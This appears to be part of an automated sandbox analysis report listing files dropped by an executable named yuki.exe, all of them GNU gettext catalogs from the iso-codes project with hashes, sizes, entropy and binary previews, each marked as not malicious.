                                                                                                    SSDEEP:96:0WMVvUP+R0E0C+fICq4fOYUpsdO0AS6p0iExH4zx/MIV57XNiQaC4KTU:0WM+s0E0Jvu9K
                                                                                                    MD5:B454537F8C544FCE9F1A5F0697CB39F6
                                                                                                    SHA1:C66E745194FA10A29893429ACB6C4ADEC1D9225B
                                                                                                    SHA-256:4712C4C9CD177BE096B262576341FB56D5CC9CE6638B21DA8A9604FC8119AC00
                                                                                                    SHA-512:169F3843AE8D9AAD427EC8F463E57B75B7835AF714DFF21F45995E8E8B2859CA2E22E6E34B31D37DA08FF3A36704E218C0912B70AB70B572366520D60929850C
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...............................................................................................................................:.......F.......U.......e.......v...!.......................*...................................&.......6.......@.......N.......d.......r.......................................................................................*.......J.......j.......x......................................................................................."...............=.......G.......R.......a.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10383
                                                                                                    Entropy (8bit):5.106354303750374
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dYPr9FiCewWltU4WjV9qWxa5hW8IGCa8X1O8dWoGh0U:O5+wWg4WjVDxa5hW8Wlj2h0U
                                                                                                    MD5:B7AF7ECE1E059585180BC11FE251D92D
                                                                                                    SHA1:3EF7AA7A0A628F0823BCE34EFDCF13B9D56C445B
                                                                                                    SHA-256:658ACE7183BB994D87B432A8E37D54D5D9609EC49EA671F73D534887A94C13D9
                                                                                                    SHA-512:32CA200072B3B473A8D94681F4C64BC13D36A3C1567B2C0CC8FF42ABCC26156532A29E9ADCC33927A5BDDA600CE080C5A3E195A8CB141193F8234720878683C2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23454
                                                                                                    Entropy (8bit):5.024676808887406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosIXawPgMUIt46nbjz5wsWP48WAINiZGI0TtbggKV/A+s+:0oRPfUIt48fmsWP48WAIVTtbhS/AL+
                                                                                                    MD5:55E78511F0A1F8C3F03A44D116D63388
                                                                                                    SHA1:09DAE79158DC1A7220D4AE3B80BB939C80C350FD
                                                                                                    SHA-256:EB58CDF4CAB2459F90434B2D6F8E293A7F7116F767CB5DCFD15064B055179F1B
                                                                                                    SHA-512:DADAB2B846130159BE25430364E36CAF2F0F2197961347F846CBB5D0C586F49F30E7450E197C690BA804DA60017B9625825CC983F1A32CB88ECB1D63859D43C2
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4820 messages, Project-Id-Version: iso_3166-2 ''As\304\253r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):212230
                                                                                                    Entropy (8bit):5.360128994632522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:CrH9lLz7OUzU126JaHUki28Ms2o6IqKNuq1R9qwMP5T9XkNbvseeFiB11m6PI0YS:C5lv7ca0o/jo6IQhT9UNwkYNons38
                                                                                                    MD5:FBC3184600F4C885296F36AB500ADCCD
                                                                                                    SHA1:18DB52AEA5D8FA61653D091AF853B19B2C3DD475
                                                                                                    SHA-256:466AAB6A14A6AABFEE4CE464F34B404C3252D0F6F28336F1DDA972658ED7AA19
                                                                                                    SHA-512:B01C184AAECF7FC7101D40070314641D14D75FF47D22D01DBA337D0941BDDD084C30D7B9985FC376B2CE54C24B8C4DE1CCC3227F2E322DE6F3BFBC7838FD5CF5
                                                                                                    Malicious:false
                                                                                                    Preview:........................\-.................................................................................%.......*.......2.......7.......@.......E.......M.......m.......s.......|...................................................................................................................................).......6.......;.......J.......Q.......f.......l.......|......................................................................................................................................+...........K.......P.......c.......j.......w.......}...................................................................................................&.......1.......F.......R.......^.......j.......x...........................................................................................&.......3.......=.......I.......X.......`.......j.......t.......}...........................................................................................%.......3.......C.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britisches Antarktis-Territorium'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2815
                                                                                                    Entropy (8bit):5.222471948127772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3g/YlSJe2/J+vGqIfdvqN5CoU1ySgtOMrkgrK0Q9:rLvDC+yaCoE92OMrkgK9
                                                                                                    MD5:E635636FBB13E30F40CD99E4793F336B
                                                                                                    SHA1:CA1E59A2B01B0CF6DE5A94C23D3B7044515753CD
                                                                                                    SHA-256:44EA7D672CAB689B332DA5F1CBA4E82528F587631301E0C553D629CDC5AFAEDE
                                                                                                    SHA-512:D3D11C1D6456547AD663F79D9D0E54509AD45C7693E519B48257335891F4571049BF399AEB54E3A637E5D7C2C2DE85BFD044072E7ED9907788628A115BD79A4F
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+....................... .......(.......,...........9...=...V...........................................(...................6.......Q......._.......l...................".......................................&.......1...(.......Z.......n...........(.......2....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB-Einheit eines Kontos'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9904
                                                                                                    Entropy (8bit):5.004375632396056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFQZkF66VRyK0G/2LCntxv36I8FmVEEdJ7batp:SiZc66TL0G/Uo/vq/QVRd5baj
                                                                                                    MD5:CF63B965745477D0722FE650DB621F69
                                                                                                    SHA1:B9571B6F23687470004BD3FFD5C088CA3D5E0E31
                                                                                                    SHA-256:F9636F14115D73F179DAC8B81AD5442DCF78A5743083555E93C1FA562E7E95CC
                                                                                                    SHA-512:FF50BD1749EAB1FCA7DB6E5F2359533AA9E80D31686B1E0B9768C26541F71D57C7F97B95F246372FC78DDAEE3F3E609EDAD93774FB71D39B3C9E4149CD917F0E
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8919 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):395660
                                                                                                    Entropy (8bit):5.298981484395671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:uxCisBLwfVOG6A6+s2LVzawTsOSGWJ1DghdaPpilWxyiGDezu9XqUFa23:cPdfSA6uy3TDghgBMWeIaE23
                                                                                                    MD5:F1414518DEE0BC102EF933C9B9A27150
                                                                                                    SHA1:85F01D4D60C37D15AEE064FF3BB92EBF19F206F1
                                                                                                    SHA-256:60264F64CDDDB98AC5883BEDE6EBE9DA6632F7BE49760914F6E6F4B278130F4B
                                                                                                    SHA-512:2C11855F8AF48453CB30AC298DA65E22C4D11CF26EAAD75D8AB3808090E86CA53034D760BC2B8B67EFA0837A7B9F65A7E3EF55C9AC92A0ADD199C532080F6292
                                                                                                    Malicious:false
                                                                                                    Preview:........."..........y....-......p.......q.......z...............................................................................................................................................................&.......+.......0.......6.......:.......G.......L.......Q.......V.......\.......d.......i.......z...............................................................................................................................................&...............4.......;.......A.......H.......L.......[.......e.......u...............................................................................................................................................$.......,.......4.......:.......H.......N.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|...............................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-Asiatische Sprachen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7860
                                                                                                    Entropy (8bit):4.8990660435071725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2LJkVfRSlSE0BfCuXr5VcJHVCeARVoX6zRgGcGdZfEgDmrBen5v33:4SDxt2iSE0BfNcaeARzL533
                                                                                                    MD5:E964EFA504DF88D91091FFF8026FE545
                                                                                                    SHA1:78C55380498DDD566A9961322BFE7803D4642E70
                                                                                                    SHA-256:ACC27A07862DF2BB5B78BBD66B0F937036CEC5FF2081FCAD7E540E2A5294F239
                                                                                                    SHA-512:7971F31950AD466995FBE014561407206C539DC9935B50881DCFFD8F349B4964BD6001F5557C40530B95E2D7CCE5368DBD1DD3CE9ABA21067E0EF79E3AF18CFE
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 203 messages, Project-Id-Version: iso_3166-1 '\336\207\336\246\336\212\336\260\336\243\336\247\336\202\336\250\336\220\336\260\336\214\336\247\336\202\336\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11257
                                                                                                    Entropy (8bit):4.923690401799442
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Z6/0WD6cPFZBEVXq+vCrTe8zugykLD7xnfwVvohx2pKVAq:o/LPFZe1LCrqcugykLDN7oKVAq
                                                                                                    MD5:5BF64E5C11ED000501FD47F059978568
                                                                                                    SHA1:72802DE702098A19DEE8ED897BF21112C7E1EF57
                                                                                                    SHA-256:5C3B282BF5BA93F53DE82702E586AE054DA903D90C3854F9732565E9A47B8362
                                                                                                    SHA-512:EC6EC71630A527A12E7AE4EB2262CD011374665402FEB7D5EABEA673ED7AD98C0C869EB8EC575D969D19728C928EF11AA7DC38AB7957229E2DA77C0514975ADE
                                                                                                    Malicious:false
                                                                                                    Preview:................t...............................................%.......4.......<.......C.......L.......`.......j.......r.......x.......................................................................................................................................#.......,.......9.......A.......J.......S.......Z.......i...............................................................................................................................................+.......3.......<.......J.......i.......n.......v.......}............................................................................................................................................... .......).......3.......;.......C.......I.......S.......X.......`.......l.......s.......y...............................................................................................................................................................".......'.......-.......8.......C.......M.......T.......\.......c.......l.......w.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 397 messages, Project-Id-Version: iso_3166-1 '\340\275\250\340\275\225\340\274\213\340\275\202\340\274\213\340\275\223\340\275\262\340\275\246\340\275\262\340\274\213\340\275\217\340\275\261\340\275\223\340\274\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40229
                                                                                                    Entropy (8bit):4.82790178229774
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:m5MRo5AivwlXmsOP4XJOAjy/cJq6EBKqtRsYYDvwJsG9xexp3PhLl2hUg:LMEshPJxxSW
                                                                                                    MD5:C9DCFCB40C4AD2D726FA67C8DDAEA51A
                                                                                                    SHA1:89C2687613D29DE2CB1B1218C4435CE7E3C472A0
                                                                                                    SHA-256:B95E2F72CCB47BE7BCF9C0B99F79BB75095EDFDC794C728E72E5FBC9B750AF58
                                                                                                    SHA-512:B4695D77C74A0CDE5E8D5B0FBF4A5C37781D20A220D87C58B6BA3878A8D5E215DDEF00960CFC7E106AE4230F3627CE71156EABCBB8F0CC0FD58D80C954251268
                                                                                                    Malicious:false
                                                                                                    Preview:................................`!......a!......m!......u!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......""......*"......2"......="......F"......N"......V"......]"......c"......k".. ...r".......".......".......".......".......".......".......".......#......&#......8#......A#......N#......V#......_#......h#......o#......~#.......#.......#.......#.......#.......#.......#.......#.......#..,....$......<$......D$..%...J$......p$......}$.......$.......$.......$.......$.......$..%....$..,....$.."....%..*...0%......[%......c%......l%......u%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..'....&..$...;&......`&......|&.......&.......&.......&.......&.......&.......&.......&.......'.......'......4'......:'......L'......S'......['......c'......i'......s'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'..!....(......)(......;(......Y(......b(..0...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\275\226\340\275\262\340\275\242\340\275\262\340\274\213\340\275\212\340\275\262\340\275\244\340\274\213 \340\275\250\340\275\272\340\275\223\340\274\213\340\275\212\340\275\200\340\274\213\340\275\212\340\275\262\340\275\200\340\274\213 \340\275\246\340\274\213\340\275\201\340\275\274\340\275\204\340\275\246\340\274\215(\340\275\225\340\276\261\340\275\262\340\274\213\340\275\202\340\276\263\340\275\262\340\275\204\340\275\224\340\274\213\340\275\221\340\275\204\340\274\213\340\275\242\340'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4758
                                                                                                    Entropy (8bit):4.979432804091915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADtZfOvGqIfdvqNuoURL+9txYnwHRG+yeRW7dYUQMQ4DAze+UW+CZmakM3wHpFq:qDtoyBoIL+9Vxt87GTz+CZJkMAHO
                                                                                                    MD5:06268BD328DE4946808058D74630B672
                                                                                                    SHA1:33F9371C09705BBD7DF516841A4332CF9F6D7BEA
                                                                                                    SHA-256:92805893547069B200387378DD8C3171FAE560C094135F51E60615011C2DBA3D
                                                                                                    SHA-512:F9BC90D426F1D829BBC08F04F3E12A391143A4D664395DB47F5693AFC8F529F6A0E8DD1186F5FFF7CC2B7AE3D6D1D819F55F4D9CC3BA724D465ED693A79C1A25
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c......................._.......Q...........j.......................9.......1...2...F...d...L.......w.......X...p...d.......C.......:...r...O.......0.......7.......}...f...8.......S...........q...C.......u...........A...D.......a...2...*...............7...^........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):522
                                                                                                    Entropy (8bit):5.283229655734183
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4h1xxLtt02Ukl//xtLLR/4FEesXmBQWiOWRl:Rhnjt0UNp/osXmGRl
                                                                                                    MD5:03B5D626C7246A6BC9C3BEB05C52455E
                                                                                                    SHA1:2D85895CB7E18507FD5D101EB1B410FC629A05FD
                                                                                                    SHA-256:C849C373A127EEE069EF2E173C67AB8DF4C449B4CC747229FAE939FD941FB964
                                                                                                    SHA-512:5C2351B7F6CB38FC3FD3EC1CAC0AF4A29861EB2E0FEB27A50F9A58AAA75FE0FF08ADC15E1B2A122EAA80812B60131DC6EE68DAE3BE598D25E8DD04D9A92254F3
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 05:28+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Ewe <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ee/>.Language: ee.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 27 messages, Project-Id-Version: iso_15924 '\316\221\317\201\316\261\316\262\316\271\316\272\316\254'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1864
                                                                                                    Entropy (8bit):5.3415452209353935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:HChxQb7NAPj/N/jqj/JalcA6T/d/0VLMFCVt0Uoy9YNk/QXmGJu8RgC/dHflr11i:iHQb7NAjdY/BFJ4MFlUVCkJjytrG
                                                                                                    MD5:00A0F578F8909ECD85986B433BC4F9BC
                                                                                                    SHA1:1D2A957F2F5FAB1D24103E678822B9571C3AE476
                                                                                                    SHA-256:93DA44CB2BB54DB43331BC1F5BF9EFAB7ECFF06545DE72EFD66C60C46D26D912
                                                                                                    SHA-512:CFC3B13D12DE8143E3E250F7BC18B5CF104A1C238F70EFC3963DC71AB690975271A8D1689D3FB3A041FE70B8914FB501588508C83393DFE5171448E6B008BAE3
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......h.......q.......y.......................................................................................................................................).......3.......>.......E.......K.......P.......X.......*.......9.......J.......].......j.......y...................%.......+................... ......./.......@.......W...+...f....................................................................... .......5........................................................................................................................................................Arabic.Armenian.Bengali.Braille.Coptic.Cypriot.Cyrillic.Egyptian demotic.Egyptian hieratic.Egyptian hieroglyphs.Elbasan.Gothic.Greek.Gujarati.Hebrew.Imperial Aramaic.Latin.Linear A.Linear B.Malayalam.Mongolian.Phoenician.Syriac.Tamil.Thai.Tibetan.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2019-06-18 19:05+
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\316\221\317\206\316\263\316\261\316\275\316\271\317\203\317\204\316\254\316\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30772
                                                                                                    Entropy (8bit):5.266627697298047
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZgdMVIxT+AItmsWP4XdAIn+owosbwAPITDFmEITvrjGgu:LnSYAow+fcAR
                                                                                                    MD5:41D188EB7608303E6AE40B08AED97C82
                                                                                                    SHA1:4BEE1DD8BBEA0EA48E6D48F5EA4B0B84D84FF347
                                                                                                    SHA-256:F018EA325E3FF6912A505D1B5E8545AAFA443852C0CE74F285AF47605D3F70D0
                                                                                                    SHA-512:7582BE45F472CAE341D3BDFA6CDD595961DDDCB0843C493D5D08C02AE7A030F32A3D8D6B7C8EE2642899CAD22A2B4DF5B1813F3A8479B7480E184717457D4EF5
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_3166-2 '\316\221\316\273\316\261\316\274\317\200\316\254\316\274\316\261'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9264
                                                                                                    Entropy (8bit):5.130597997018435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2GKqXBSfftRurvFkEXKgjRz7TVf/Bi36FtgAGWs4O0mSYY9h3Xj2F:xXR+FR0vR6gjdy36oBJ4uSYYz3XS
                                                                                                    MD5:662885A55033271F17C913AF48C1408B
                                                                                                    SHA1:A8B2646EDC7879E14DA3AFB791D6E25E45746B3A
                                                                                                    SHA-256:DCF21E87A31109D1B400BFF454DD74FE993BBA1B78C81F553A6FCF5CEAC9CE22
                                                                                                    SHA-512:1AD1E11F4A44C8D01E6E6171C637AB0FD1E8BB53073529E301F5EBFB37A29D889DF6CB285CB7DC711F0A67E597C0A6E8466A4C9D4149F433E9CD2CCAC778F1A7
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................%...............7.......H.......O.......X.......a.......i.......q.......x.......................................................................................................................................$.......).......1.......9.......@.......H.......U.......`.......e.......o.......w.......~...............................................................................................................................................................$.......-.......<.......C.......M.......Y.......b.......i.......m.......u...............................................................................................................................%.......>.......Q.......g.......{.......................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\316\225\316\264\316\254\317\206\316\277\317\202 \317\204\316\267\317\202 \316\222\317\201\316\265\317\204\316\261\316\275\316\271\316\272\316\256\317\202 \316\221\316\275\317\204\316\261\317\201\316\272\317\204\316\271\316\272\316\256\317\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3428
                                                                                                    Entropy (8bit):5.520022640040408
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD9k0gpzvGqIfdvqNuoUZ8kyMgm+r7We89SQXHgE6q/fvy:qDetpzyBosyuU77Wt6q/i
                                                                                                    MD5:6DCEE26E03A1F0628723844E0B64F27D
                                                                                                    SHA1:C8CE0F229E5BB807DA35075958A0192BE984285F
                                                                                                    SHA-256:F8443650B075CC3CFFFAAF04FD1A1EC8D103BA5247D250E244F83FBA40692825
                                                                                                    SHA-512:AB403A996711493D84593078BC2263E4EDD592CB840A1F2933B57A7342C636EDE81604693026DAC79B5F6CBBD9824D68DF5F4B625F0D20EF9D3287EE77424DF5
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................?.......Z.......^.......3...{...f...............+...'.......S...(...q...).......@.......9......./...?.......o...........%.......................D.......-...F...*...t...................R.......[...........s...6...............L.......%...>........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 151 messages, Project-Id-Version: iso_4217 '\316\233\316\277\316\263\316\271\317\203\317\204\316\271\316\272\316\256 \316\274\316\277\316\275\316\254\316\264\316\261 ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9431
                                                                                                    Entropy (8bit):5.188318771426307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1SaYC6DJVay5MX/WBeBoESu2r+Ah3k+cJQJ6Z26PVbt:1SUyMX+BWoE92TQyJ6xPpt
                                                                                                    MD5:AC4474A740E5719E45EA27CCC83C506C
                                                                                                    SHA1:9F92FCCE962B7EB2C95CAAF0BB3F5DDCA4C8557E
                                                                                                    SHA-256:870BA2CD2FE0A735ECD7B2D1D0A0E0EC30970A102AC5BA3438F888E38C8EA0DC
                                                                                                    SHA-512:A4E10DBB42304DB8DADA55A6FF6881D1C3093C321662F6DF509E56250451FC1AFC0B1C42DC90E690C1246C1F1448A290B9393CF0EC690C2ECFC4570CBAE10635
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................!......./.......A.......Q.......`.......e.......l.......|...............................................................................................(.......>.......K.......Z.......j.......v...............................................................................................................)...............E.......Q.......X.......c.......s.......x.......................................................................................................................*.......1.......6.......;.......J.......N.......V.......\.......l.......y.......................................................................................................!.......4.......F.......Y.......b.......s.......................................................................................................................................!.......(.......6.......C.......V.......b.......p.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 830 messages, Project-Id-Version: iso_639-3 '\316\221\316\274\317\200\316\261\317\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57390
                                                                                                    Entropy (8bit):5.295858961553772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:GhF+nAGiI+e6obcRd0fQsf6GLR2ArjjkFM1I+CNqbfXFU:GhF+/+VoQRa99LRbfjuM14NqbfXFU
                                                                                                    MD5:493D1F518495D3600EFEE81359F6EAA7
                                                                                                    SHA1:57CD0E8B018878768CEA7CFD5629327783AED464
                                                                                                    SHA-256:03BF330AD07E28080671CFC8FD4C25CD0EB010CBA6897337F257BAF03759FC05
                                                                                                    SHA-512:F16EA9D387BC7C386DB272F169A7C5A30C1A13270E98625702E8A948BEDEBFCE58408C9720E643959B824795E24ECEA0B104226B2B87F3570B894BC93205FFCE
                                                                                                    Malicious:false
                                                                                                    Preview:........>...........U....3......PE......QE......VE......\E......cE......gE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F......+F......AF......VF......eF......tF.......F.......F.......F.......F.......F.......F.."....F.......G......1G......8G......IG......bG......uG.......G.......G.......G.......G.......G.......G.......G.......H.......H......-H......IH......^H......mH.......H.......H.......H.......H.......H.......H.......H.......I.......I......)I......:I......PI......_I......pI.......I.......I.......I.......I.......I.......I.......I.......J......!J......3J......8J......>J......RJ......gJ..#...pJ.......J.......J.......J.......J.......J.......J.......J.......K.......K......'K......<K......DK......[K......bK......jK......oK......uK......}K.......K.......K.......K.......K.......K.......K.......K.......K.......L.......L......!L......(L......>L......HL......`L......qL.......L.......L.......L.......L.......L.......L.......L.......L......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 24 messages, Project-Id-Version: iso_639-5 '\316\221\317\206\317\201\316\277-\316\261\317\203\316\271\316\261\317\204\316\271\316\272\316\255\317\202 \316\263\316\273\317\216\317\203\317\203\316\265\317\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2391
                                                                                                    Entropy (8bit):5.386980140199228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:+drO06P5w0CUWksxG5eAwTwvA5Qs5uwh5Mrxl5oouw1FqDxZ522gN3:+drO0S57Cksxq5w0vYQsV/MtbooV1FAA
                                                                                                    MD5:3ABA2D02163E1E06FD4A3CB4335083F4
                                                                                                    SHA1:33D2E98D754F23EC5F793D26A6425307D00F561F
                                                                                                    SHA-256:ECA6AA02A0D60D082DA6A3C804461F376367FB8A0BF7AE754698EF585C341161
                                                                                                    SHA-512:8CB114ED0B3CB8A68DF17F809F5649473EA476338B5C8A20B87711D08729A8DD7DEF6F09561C31C09DC697EE488E7896285FB5B6189E5157A3341BA6064794E0
                                                                                                    Malicious:false
